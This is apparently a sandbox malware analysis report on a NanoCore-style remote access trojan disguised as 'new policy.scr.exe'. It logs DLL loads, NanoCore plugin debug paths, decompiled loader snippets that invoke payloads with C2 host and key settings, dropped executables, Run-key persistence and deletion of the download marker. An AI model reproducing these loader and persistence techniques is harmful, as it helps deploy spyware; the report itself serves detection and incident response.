Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\new policy.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: new policy.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: new policy.scr.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: new policy.scr.exe

Static file information: File size 2360320 > 1048576

Source: new policy.scr.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x22f000

Source: new policy.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\ARM\Desktop\ncsource\Plugins\CorePlugin\CoreClientPlugin\obj\Release\CoreClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: new policy.scr.exe, ParamCreatorObject.cs	.Net Code: MapSingleton System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: Memory
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 6.2.Networks!.exe.4a592f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Networks!.exe.46792f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.5af0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.4d192f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.4af4e70.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.49e0650.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2303284343.000000000297D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1884977634.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2324492421.0000000004679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2232333043.0000000004A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059EB76B pushfd ; retf	0_2_059EB76E
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BFD170 push 8B6C5ADFh; iretd	0_2_05BFD175
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BFD320 pushad ; retf	0_2_05BFD321
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05C0328E push edi; iretd	0_2_05C03291
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D570FA push eax; retf	0_2_05D570FB
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E67F92 push 00000031h; retf	0_2_05E67F94
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588D88F push DA0588D1h; ret	3_2_0588D8C9
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588D8CB push ss; ret	3_2_0588D8D1
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_07757F28 push esp; ret	3_2_07757F29
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B546C4 push edx; iretd	6_2_02B546D2
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A2B76B pushfd ; retf	6_2_05A2B76E
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C3D170 push 8B6C56DFh; iretd	6_2_05C3D175
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C3D320 pushad ; retf	6_2_05C3D321
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C4328E push edi; iretd	6_2_05C43291
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D970FA push eax; retf	6_2_05D970FB
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F146BF push edx; iretd	7_2_00F146D2
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05590D72 push eax; iretd	7_2_05590D1D
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055DB76B pushfd ; retf	7_2_055DB76E
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057ED170 push 8B6C9BDFh; iretd	7_2_057ED175
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057ED320 pushad ; retf	7_2_057ED321
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057F328E push edi; iretd	7_2_057F3291
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_059470FA push eax; retf	7_2_059470FB
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 9_2_05A073CD push FFFFFF8Bh; iretd	9_2_05A073CF

Drops PE files

Source: C:\Users\user\Desktop\new policy.scr.exe	File created: C:\Users\user\AppData\Roaming\Networks!.exe			Jump to dropped file
Source: C:\Users\user\Desktop\new policy.scr.exe	File created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe			Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\new policy.scr.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Networks!

Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Networks!			Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Networks!			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\new policy.scr.exe

File opened: C:\Users\user\Desktop\new policy.scr.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
